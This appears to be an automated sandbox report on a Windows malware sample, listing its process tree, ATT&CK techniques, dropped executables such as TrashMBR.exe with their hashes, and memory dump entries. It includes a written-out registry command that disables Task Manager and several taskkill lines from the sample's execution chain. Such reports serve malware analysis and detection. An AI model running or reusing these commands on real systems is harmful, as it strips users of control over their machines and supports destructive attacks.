reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:4104

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\beeper.exe
beeper.exe
3⤵
- Executes dropped EXE
PID:3776

C:\Windows\system32\timeout.exe
timeout 1 /nobreak
3⤵
- Delays execution with timeout.exe
PID:940

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseError.exe
MouseError.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3804

C:\Windows\system32\timeout.exe
timeout 5 /nobreak
3⤵
- Delays execution with timeout.exe
PID:720

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseWarning.exe
MouseWarning.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5060

C:\Windows\system32\timeout.exe
timeout 5 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1592

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseAppIcon.exe
MouseAppIcon.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3800

C:\Windows\system32\timeout.exe
timeout 10 /nobreak
3⤵
- Delays execution with timeout.exe
PID:3100

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\PlgBlt.exe
PlgBlt.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4612

C:\Windows\system32\taskkill.exe
taskkill /f /im MouseError.exe
3⤵
- Kills process with taskkill
PID:4708

C:\Windows\system32\taskkill.exe
taskkill /f /im MouseWarning.exe
3⤵
- Kills process with taskkill
PID:3164

C:\Windows\system32\taskkill.exe
taskkill /f /im MouseAppIcon.exe
3⤵
- Kills process with taskkill
PID:2300

C:\Windows\system32\timeout.exe
timeout 1 /nobreak
3⤵
- Delays execution with timeout.exe
PID:3392

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseError.exe
MouseError.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseWarning.exe
MouseWarning.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2600

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseAppIcon.exe
MouseAppIcon.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4468

C:\Windows\system32\timeout.exe
timeout 15 /nobreak
3⤵
- Delays execution with timeout.exe
PID:4268

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\BitBlt.exe
BitBlt.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3584

C:\Windows\system32\timeout.exe
timeout 5 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1916

C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\glitch.exe
glitch.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4496

C:\Windows\system32\timeout.exe
timeout 30 /nobreak
3⤵
- Delays execution with timeout.exe
PID:1284

C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"
1⤵
- Drops file in Program Files directory
PID:3120

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\ChromeRecovery.exe
"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={9e957ae0-b799-4977-b7aa-2cd670259d16} --system
2⤵
- Executes dropped EXE
PID:740

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Bootkit

T1067

Privilege Escalation

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir3120_1931614745\ChromeRecovery.exe
Filesize
253KB

MD5
49ac3c96d270702a27b4895e4ce1f42a

SHA1
55b90405f1e1b72143c64113e8bc65608dd3fd76

SHA256
82aa3fd6a25cda9e16689cfadea175091be010cecae537e517f392e0bef5ba0f

SHA512
b62f6501cb4c992d42d9097e356805c88ac4ac5a46ead4a8eee9f8cbae197b2305da8aab5b4a61891fe73951588025f2d642c32524b360687993f98c913138a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.141\Recovery.crx3
Filesize
141KB

MD5
ea1c1ffd3ea54d1fb117bfdbb3569c60

SHA1
10958b0f690ae8f5240e1528b1ccffff28a33272

SHA256
7c3a6a7d16ac44c3200f572a764bce7d8fa84b9572dd028b15c59bdccbc0a77d

SHA512
6c30728cac9eac53f0b27b7dbe2222da83225c3b63617d6b271a6cfedf18e8f0a8dffa1053e1cbc4c5e16625f4bbc0d03aa306a946c9d72faa4ceb779f8ffcaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\BC4C.tmp\BC4D.bat
Filesize
1KB

MD5
8c5dafc8fbd26dd529c25a01ecd5a51d

SHA1
839e962516258049a9e5e358dec7fe352e09d840

SHA256
355785cc786eed7dffecfa7d33872f6de6baa833dce34598adf0d5c8688c00f6

SHA512
fda772a900c542eb59f4a94dc1eadec9677bb117e84a07c4e5c1afbf853704e6be4031383330f0dd88d2b48bbca973484c1e60ab3aa9424158f2c787e63de295

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\BitBlt.exe
Filesize
103KB

MD5
d96dcc6c97ee4740f0a3a41b3bccf5cc

SHA1
25530ffaf174063c119e2d0c06afdc1d2bdd416f

SHA256
e0c40f127ceef9de46569154ef16f59e7e15d19477beb167f67a72d35193114e

SHA512
0f9ca7eb852edb469fd2f73e8b2a9425771d359aff4fde220193996befaa07fb57ac5e77d11b4cf29f3d64b358169d6a95cab02af57e5eea390063d5bd9e8372

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\BitBlt.exe
Filesize
103KB

MD5
d96dcc6c97ee4740f0a3a41b3bccf5cc

SHA1
25530ffaf174063c119e2d0c06afdc1d2bdd416f

SHA256
e0c40f127ceef9de46569154ef16f59e7e15d19477beb167f67a72d35193114e

SHA512
0f9ca7eb852edb469fd2f73e8b2a9425771d359aff4fde220193996befaa07fb57ac5e77d11b4cf29f3d64b358169d6a95cab02af57e5eea390063d5bd9e8372

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseAppIcon.exe
Filesize
103KB

MD5
92af619c1bdabf79c26bddda2556d9d0

SHA1
ac153eb6edd873abf6dcb6a0edbc9922d15e5dd1

SHA256
72a5692d137571317f84287c4f2abb341b95173f9ee43901f6b3272bb1631e95

SHA512
439855a8487f5cdd5ec195c303c85078af69c05ae28a837ff4d74d8e9f922a9556299b02b7bfdbe47f4287772604b21fe017ee49e0668022877a063771a37adb

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseAppIcon.exe
Filesize
103KB

MD5
92af619c1bdabf79c26bddda2556d9d0

SHA1
ac153eb6edd873abf6dcb6a0edbc9922d15e5dd1

SHA256
72a5692d137571317f84287c4f2abb341b95173f9ee43901f6b3272bb1631e95

SHA512
439855a8487f5cdd5ec195c303c85078af69c05ae28a837ff4d74d8e9f922a9556299b02b7bfdbe47f4287772604b21fe017ee49e0668022877a063771a37adb

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseAppIcon.exe
Filesize
103KB

MD5
92af619c1bdabf79c26bddda2556d9d0

SHA1
ac153eb6edd873abf6dcb6a0edbc9922d15e5dd1

SHA256
72a5692d137571317f84287c4f2abb341b95173f9ee43901f6b3272bb1631e95

SHA512
439855a8487f5cdd5ec195c303c85078af69c05ae28a837ff4d74d8e9f922a9556299b02b7bfdbe47f4287772604b21fe017ee49e0668022877a063771a37adb

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseError.exe
Filesize
103KB

MD5
cc72818ce44b3506b64b7f9a73d701bf

SHA1
041497924684e41aa671fe64acf6f980e0d9da7c

SHA256
48da69b9dfd600973ffcdba14abd88972ae51a5cae31b41d85ed56977f2b94dc

SHA512
4e3ad05ad99bd8c150ad99c8becca122613e446c678617f0a5a28e780706afe03580ec643956245e5e02d169e4f28bdf4f95b7d095d8e055517508c7dbeb0149

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseError.exe
Filesize
103KB

MD5
cc72818ce44b3506b64b7f9a73d701bf

SHA1
041497924684e41aa671fe64acf6f980e0d9da7c

SHA256
48da69b9dfd600973ffcdba14abd88972ae51a5cae31b41d85ed56977f2b94dc

SHA512
4e3ad05ad99bd8c150ad99c8becca122613e446c678617f0a5a28e780706afe03580ec643956245e5e02d169e4f28bdf4f95b7d095d8e055517508c7dbeb0149

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseError.exe
Filesize
103KB

MD5
cc72818ce44b3506b64b7f9a73d701bf

SHA1
041497924684e41aa671fe64acf6f980e0d9da7c

SHA256
48da69b9dfd600973ffcdba14abd88972ae51a5cae31b41d85ed56977f2b94dc

SHA512
4e3ad05ad99bd8c150ad99c8becca122613e446c678617f0a5a28e780706afe03580ec643956245e5e02d169e4f28bdf4f95b7d095d8e055517508c7dbeb0149

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseWarning.exe
Filesize
103KB

MD5
ad241a26c7f536fdb0658d602a86fcdd

SHA1
f862eecbac2d4afe4a437b77c6020b6de38b0671

SHA256
c3c6fe174f474e47b93e7aea1d0d77539d6880c3d84acac6412eff3393366dae

SHA512
5d8f9bd5d17a98b03adb4f0e173f011071708847748395889e7b582a25fc9f4606223415d9b61b3f82274a3addd73d86752bfba0bcb452990347f6b1439d672f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseWarning.exe
Filesize
103KB

MD5
ad241a26c7f536fdb0658d602a86fcdd

SHA1
f862eecbac2d4afe4a437b77c6020b6de38b0671

SHA256
c3c6fe174f474e47b93e7aea1d0d77539d6880c3d84acac6412eff3393366dae

SHA512
5d8f9bd5d17a98b03adb4f0e173f011071708847748395889e7b582a25fc9f4606223415d9b61b3f82274a3addd73d86752bfba0bcb452990347f6b1439d672f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\MouseWarning.exe
Filesize
103KB

MD5
ad241a26c7f536fdb0658d602a86fcdd

SHA1
f862eecbac2d4afe4a437b77c6020b6de38b0671

SHA256
c3c6fe174f474e47b93e7aea1d0d77539d6880c3d84acac6412eff3393366dae

SHA512
5d8f9bd5d17a98b03adb4f0e173f011071708847748395889e7b582a25fc9f4606223415d9b61b3f82274a3addd73d86752bfba0bcb452990347f6b1439d672f

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\PlgBlt.exe
Filesize
104KB

MD5
5d8ff1dd3662ac09e5bfa682ffdb233e

SHA1
c0ed5cfd5fa76db7087b4f25a806e124e29520af

SHA256
7cd320070e23e6582589d83f01f4da86ce0d1c0fe83d8df2007886c6ea10cc83

SHA512
d2258dda192a6a938989617aa46c33c0eabfae2a2d3284d3ac999b8d482ff2f08ffde836156ff341e51029d946f71ce77892b13a5924996b92a7773f2e123bb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\PlgBlt.exe
Filesize
104KB

MD5
5d8ff1dd3662ac09e5bfa682ffdb233e

SHA1
c0ed5cfd5fa76db7087b4f25a806e124e29520af

SHA256
7cd320070e23e6582589d83f01f4da86ce0d1c0fe83d8df2007886c6ea10cc83

SHA512
d2258dda192a6a938989617aa46c33c0eabfae2a2d3284d3ac999b8d482ff2f08ffde836156ff341e51029d946f71ce77892b13a5924996b92a7773f2e123bb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\TrashMBR.exe
Filesize
1.3MB

MD5
42d06436fdc392a4e90d03623119fa87

SHA1
df9f007d438fc17fd47324b74a82d100a0763204

SHA256
82f2e6b2cdad0ef859fe839c97bd7c0a34452638d49094979d7c0c4488b5c2ab

SHA512
52655cd83ab881c93c9076ad0d8a9b8ebeba37d6d2b00ebcf5a45f1e835463898aa22611445ff7505977cb8d8942e2f8b6a60706ec7eee494f7131ecc65e76c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\TrashMBR.exe
Filesize
1.3MB

MD5
42d06436fdc392a4e90d03623119fa87

SHA1
df9f007d438fc17fd47324b74a82d100a0763204

SHA256
82f2e6b2cdad0ef859fe839c97bd7c0a34452638d49094979d7c0c4488b5c2ab

SHA512
52655cd83ab881c93c9076ad0d8a9b8ebeba37d6d2b00ebcf5a45f1e835463898aa22611445ff7505977cb8d8942e2f8b6a60706ec7eee494f7131ecc65e76c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\beeper.exe
Filesize
402KB

MD5
8d1a9c2e8d53425499f3a1853d2e0910

SHA1
83962bce20d3f84b796486489e2c734afd1d0846

SHA256
1d89bd45a36dd300a250292cacf22a7beff3cfe0dfddab0d7b77c3c260032131

SHA512
81ba0b91f2fd0ba9b198c59ae7cc6115bf9b05c119ea46f37043a1981ef246c617fe6ba5590048b2e1383fb27c686b6eb75fdd6e642ea4433b404d0eaabf3950

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\beeper.exe
Filesize
402KB

MD5
8d1a9c2e8d53425499f3a1853d2e0910

SHA1
83962bce20d3f84b796486489e2c734afd1d0846

SHA256
1d89bd45a36dd300a250292cacf22a7beff3cfe0dfddab0d7b77c3c260032131

SHA512
81ba0b91f2fd0ba9b198c59ae7cc6115bf9b05c119ea46f37043a1981ef246c617fe6ba5590048b2e1383fb27c686b6eb75fdd6e642ea4433b404d0eaabf3950

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\glitch.exe
Filesize
103KB

MD5
5ce49a6bbff759faf8204a65991d6bd7

SHA1
b8fe526d5cc346c506e543c7eecef995d1f96021

SHA256
48af943061196a4f47d5de6d2335bef7bcfdb89990e8ddb2339e64024f0d50d9

SHA512
e77785d8366de1062eb0d044b3b096f3d3c7687986ec332a607333a40acf8341f917a62f910ca5b419b4122f294e11d81e6fbaf707c240baa8556ede87d01356

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\glitch.exe
Filesize
103KB

MD5
5ce49a6bbff759faf8204a65991d6bd7

SHA1
b8fe526d5cc346c506e543c7eecef995d1f96021

SHA256
48af943061196a4f47d5de6d2335bef7bcfdb89990e8ddb2339e64024f0d50d9

SHA512
e77785d8366de1062eb0d044b3b096f3d3c7687986ec332a607333a40acf8341f917a62f910ca5b419b4122f294e11d81e6fbaf707c240baa8556ede87d01356

Download Submit
C:\Users\Admin\AppData\Local\Temp\BC4B.tmp\prompt.vbs
Filesize
205B

MD5
709874d32bd68e69010acdf70cebf063

SHA1
feb94076246fe2fc902ef04d745fa0e60fe1497f

SHA256
1187be0f09aa0f917718064406e4595ac6137dd3a801e91ab2d7a03d98872da1

SHA512
bdb10baa9d02f9fff1b59e718a59c6c5a163d4a9d503fb2fe1767163fd3d746c01a7ca1546ad4febc25685d5a854635bc6170009db851a66853ce66d71d25526

Download Submit
\??\pipe\crashpad_444_TIFESESQQEJQRYHJ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/720-162-0x0000000000000000-mapping.dmp

Download
memory/740-193-0x0000000000000000-mapping.dmp

Download
memory/940-157-0x0000000000000000-mapping.dmp

Download
memory/952-164-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/952-134-0x0000000000400000-0x000000000051D000-memory.dmp

Filesize
1.1MB

Download
memory/1284-197-0x0000000000000000-mapping.dmp

Download
memory/1592-167-0x0000000000000000-mapping.dmp

Download
memory/1876-139-0x0000000000000000-mapping.dmp

Download
memory/1916-190-0x0000000000000000-mapping.dmp

Download
memory/2300-179-0x0000000000000000-mapping.dmp

Download
memory/2600-183-0x0000000000000000-mapping.dmp

Download
memory/2752-149-0x0000000000000000-mapping.dmp

Download
memory/2880-144-0x0000000000000000-mapping.dmp

Download
memory/3100-171-0x0000000000000000-mapping.dmp

Download
memory/3164-178-0x0000000000000000-mapping.dmp

Download
memory/3392-180-0x0000000000000000-mapping.dmp

Download
memory/3460-137-0x0000000000000000-mapping.dmp

Download
memory/3540-147-0x0000000000000000-mapping.dmp

Download
memory/3556-142-0x0000000000000000-mapping.dmp

Download
memory/3584-188-0x0000000000000000-mapping.dmp

Download
memory/3648-140-0x0000000000000000-mapping.dmp

Download
memory/3776-159-0x00007FFC9C7E0000-0x00007FFC9D2A1000-memory.dmp

Filesize
10.8MB

Download
memory/3776-173-0x00007FFC9C7E0000-0x00007FFC9D2A1000-memory.dmp

Filesize
10.8MB

Download
memory/3776-158-0x0000000000890000-0x00000000008FA000-memory.dmp

Filesize
424KB

Download
memory/3776-154-0x0000000000000000-mapping.dmp

Download
memory/3800-169-0x0000000000000000-mapping.dmp

Download
memory/3804-160-0x0000000000000000-mapping.dmp

Download
memory/3888-148-0x0000000000000000-mapping.dmp

Download
memory/4052-135-0x0000000000000000-mapping.dmp

Download
memory/4104-153-0x0000000000000000-mapping.dmp

Download
memory/4136-181-0x0000000000000000-mapping.dmp

Download
memory/4268-187-0x0000000000000000-mapping.dmp

Download
memory/4460-145-0x0000000000000000-mapping.dmp

Download
memory/4468-185-0x0000000000000000-mapping.dmp

Download
memory/4496-195-0x0000000000000000-mapping.dmp

Download
memory/4612-174-0x0000000000000000-mapping.dmp

Download
memory/4708-176-0x0000000000000000-mapping.dmp

Download
memory/4888-150-0x0000000000000000-mapping.dmp

Download
memory/4932-151-0x0000000000000000-mapping.dmp

Download
memory/5060-165-0x0000000000000000-mapping.dmp

Download
memory/5072-152-0x0000000000000000-mapping.dmp

Download
memory/5100-146-0x0000000000000000-mapping.dmp

Download